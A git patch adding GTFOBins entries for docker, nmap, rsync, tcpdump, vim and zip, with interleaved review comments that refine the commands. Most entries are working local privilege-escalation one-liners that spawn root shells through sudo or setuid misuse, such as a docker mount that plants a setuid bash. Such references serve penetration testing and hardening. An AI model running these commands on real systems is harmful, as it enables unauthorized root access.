From 7219385a0528c897bdcf604e0fd6ede1700c0ff8 Mon Sep 17 00:00:00 2001
From: AlessandroZ
Date: Fri, 17 Aug 2018 17:16:09 +0200
Subject: [PATCH] add new ways

---
 _gtfobins/docker.md | 7 +++++++
 _gtfobins/nmap.md | 9 +++++++++
 _gtfobins/rsync.md | 9 +++++++++
 _gtfobins/tcpdump.md | 9 +++++++++
 _gtfobins/vim.md | 19 +++++++++++++++++++
 _gtfobins/zip.md | 11 +++++++++++
 6 files changed, 64 insertions(+)
 create mode 100644 _gtfobins/docker.md
 create mode 100644 _gtfobins/nmap.md
 create mode 100644 _gtfobins/rsync.md
 create mode 100644 _gtfobins/tcpdump.md
 create mode 100644 _gtfobins/vim.md
 create mode 100644 _gtfobins/zip.md

diff --git a/_gtfobins/docker.md b/_gtfobins/docker.md
new file mode 100644
index 0000000..1bc89b1
--- /dev/null
+++ b/_gtfobins/docker.md
@@ -0,0 +1,7 @@
+---
+functions:
+ execute-interactive:
+ - code: docker run -v /home/${USER}:/h_docs ubuntu bash -c "cp /bin/bash /h_docs/rootshell && chmod 4777 /h_docs/rootshell;" && ~/rootshell -p
+ sudo-enabled:
+ - code: sudo docker run -v /home/${USER}:/h_docs ubuntu bash -c "cp /bin/bash /h_docs/rootshell && chmod 4777 /h_docs/rootshell;" && ~/rootshell -p
+---
diff --git a/_gtfobins/nmap.md b/_gtfobins/nmap.md
new file mode 100644
index 0000000..d3632f5
--- /dev/null
+++ b/_gtfobins/nmap.md
@@ -0,0 +1,9 @@
+---
+functions:
+ execute-non-interactive:
+ - code: echo "os.execute('/bin/sh')" > /tmp/script.nse
+ nmap --script=/tmp/script.nse
+ sudo-enabled:
+ - code: echo "os.execute('/bin/sh')" > /tmp/script.nse
+ sudo nmap --script=/tmp/script.nse
+---
diff --git a/_gtfobins/rsync.md b/_gtfobins/rsync.md
new file mode 100644
index 0000000..79ff9e4
--- /dev/null
+++ b/_gtfobins/rsync.md
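Review bot: `chmod 4777` on both docker code lines leaves a world-writable setuid-root copy of bash in the home directory, so any other local user can overwrite that file and inherit root the next time it runs; `chmod 4755` gives the same escalation without planting a shared backdoor. The bind mount uses `/home/${USER}` while the final step runs `~/rootshell`, and those diverge whenever the home directory is not under /home, so mounting `"$HOME"` keeps them consistent: `docker run -v "$HOME":/h_docs ubuntu bash -c "cp /bin/bash /h_docs/rootshell && chmod 4755 /h_docs/rootshell" && ~/rootshell -p`. The setuid bit is also ignored if the home filesystem is mounted `nosuid`, and the non-sudo variant presumably relies on the caller already having access to the Docker socket (e.g. docker group membership), both of which are worth stating in a `description:` field.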
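Review bot: Both nmap code entries write the NSE script to the fixed path `/tmp/script.nse`, which under the sudo variant lets any other local user pre-create or symlink that name before root nmap loads and executes it; a per-run temporary file avoids the race and the leftover artifact: `TF=$(mktemp)`, `echo 'os.execute("/bin/sh")' > $TF`, `nmap --script=$TF`. The script spawns an interactive `/bin/sh` via `os.execute`, so `execute-non-interactive` looks like the wrong function tag — the vim and zip entries in this same patch tag the same outcome as `execute-interactive`. This path only works on an nmap built with NSE/Lua support; I believe older builds offered `--interactive` instead, which could be mentioned in a `description:`.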
@@ -0,0 +1,9 @@
+---
+functions:
+ execute-non-interactive:
+ - code: echo "whoami > /tmp/whoami" > /tmp/tmpfile
+ rsync -e 'sh /tmp/tmpfile' /dev/null 127.0.0.1:/dev/null 2>/dev/null
+ sudo-enabled:
+ - code: echo "whoami > /tmp/whoami" > /tmp/tmpfile
+ sudo rsync -e 'sh /tmp/tmpfile' /dev/null 127.0.0.1:/dev/null 2>/dev/null
+---
diff --git a/_gtfobins/tcpdump.md b/_gtfobins/tcpdump.md
new file mode 100644
index 0000000..5c2165e
--- /dev/null
+++ b/_gtfobins/tcpdump.md
@@ -0,0 +1,9 @@
+---
+functions:
+ execute-non-interactive:
+ - code: echo "whoami > /tmp/whoami" > /tmp/tmpfile
+ tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z ./tmpfile -Z root
+ sudo-enabled:
+ - code: echo "whoami > /tmp/whoami" > /tmp/tmpfile
+ sudo tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z ./tmpfile -Z root
+---
diff --git a/_gtfobins/vim.md b/_gtfobins/vim.md
new file mode 100644
index 0000000..fb45d0b
--- /dev/null
+++ b/_gtfobins/vim.md
@@ -0,0 +1,19 @@
+---
+functions:
+ execute-interactive:
+ - code: vim -c ':!/bin/sh'
+ - code: |
+ vim
+ :set shell=/bin/sh
+ :shell
+ file-write:
+ - code: |
+ vim file_to_write
+ w
+ file-read:
+ - code: vim file_to_read
+ suid-enabled:
+ - code: ./vim -c ':!/bin/sh -p'
+ sudo-enabled:
+ - code: sudo vim -c ':!/bin/sh'
+---
diff --git a/_gtfobins/zip.md b/_gtfobins/zip.md
new file mode 100644
index 0000000..9d3864f
--- /dev/null
+++ b/_gtfobins/zip.md
@@ -0,0 +1,11 @@
+---
+functions:
+ execute-interactive:
+ - code: echo "/bin/sh" > /tmp/run.sh
+ chmod +x /tmp/run.sh
+ zip z.zip * -T -TT /tmp/run.sh
+ sudo-enabled:
+ - code: echo "/bin/sh" > /tmp/run.sh
+ chmod +x /tmp/run.sh
+ sudo zip z.zip * -T -TT /tmp/run.sh
+---
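Review bot: The rsync entries stage the command in the fixed, world-writable path `/tmp/tmpfile` and then have the sudo variant run `sh` on it as root, so a concurrent local user who pre-populates that file gets their own code executed instead; at minimum use `TF=$(mktemp)` and pass `-e "sh $TF"`. Because `-e` is executed as the remote shell with rsync's own pipes on stdin/stdout, no helper file is needed at all — as I understand it `sudo rsync -e 'sh -c "sh 0<&2 1>&2"' 127.0.0.1:/dev/null` yields an interactive shell directly by redirecting the inner shell's stdin/stdout to the terminal on stderr, in which case the entry belongs under `execute-interactive`. The current form also only demonstrates execution by leaving `whoami` output in the predictable `/tmp/whoami`, and the `2>/dev/null` hides the protocol error that tells the reader why rsync exits afterwards; a one-line `description:` explaining that the -e command is invoked in place of ssh would help.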
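Review bot: The tcpdump lines pass `-z ./tmpfile` although the script was written to `/tmp/tmpfile` and is never made executable, so the post-rotate exec fails unless the cwd happens to be /tmp; tcpdump execs the `-z` program directly rather than through a shell, so the entry needs `chmod +x /tmp/tmpfile` and `-z /tmp/tmpfile` (better, a `TF=$(mktemp)` path, since the sudo variant has root execute whatever sits at the fixed name). `-i eth0` hard-codes an interface, and the `-G 1` rotation only fires once a packet is captured, so `-i lo` with some local traffic (or `-i any`) is more portable. The non-sudo variant presumably only works when tcpdump carries CAP_NET_RAW or the setuid bit, since opening the interface is otherwise refused, and `-Z root` is then only meaningful in the sudo case; a `description:` should state that precondition.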
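Review bot: The `suid-enabled` entry `./vim -c ':!/bin/sh -p'` relies on vim's `:!` running the command through its `shell` option (`/bin/sh` by default); where `/bin/sh` is bash, that outer shell drops the elevated euid before the inner `-p` shell starts, so as written the technique appears to work only on systems whose `/bin/sh` does not drop privileges (e.g. dash) — worth a `description:` caveat or a variant that spawns the shell without going through `:!`. In the `file-write` block the second line is `w`, but the ex command that saves the buffer is `:w` (or `:wq`), so the snippet as written does not write the file. The `:set shell=/bin/sh` / `:shell` variant sets the default value and could use a short note on when it is preferable to `:!/bin/sh`.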
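Review bot: `-TT` appears to hand the test command to a shell with the archive name appended, so the staged `/tmp/run.sh` plus `chmod +x` on the zip lines is unnecessary and leaves a fixed-name script in a world-writable directory that root would execute under the sudo variant; `sudo zip z.zip /etc/hosts -T -TT 'sh #'` does the same in one line, with `#` discarding the appended archive argument. Archiving `*` also fails in an empty directory (zip reports "Nothing to do!") and silently pulls in whatever the cwd contains, so naming an always-present file such as `/etc/hosts` is more reliable. The `z.zip` artifact is left behind either way and deserves an `rm z.zip` after the shell exits, or a `TF=$(mktemp -u)` archive name.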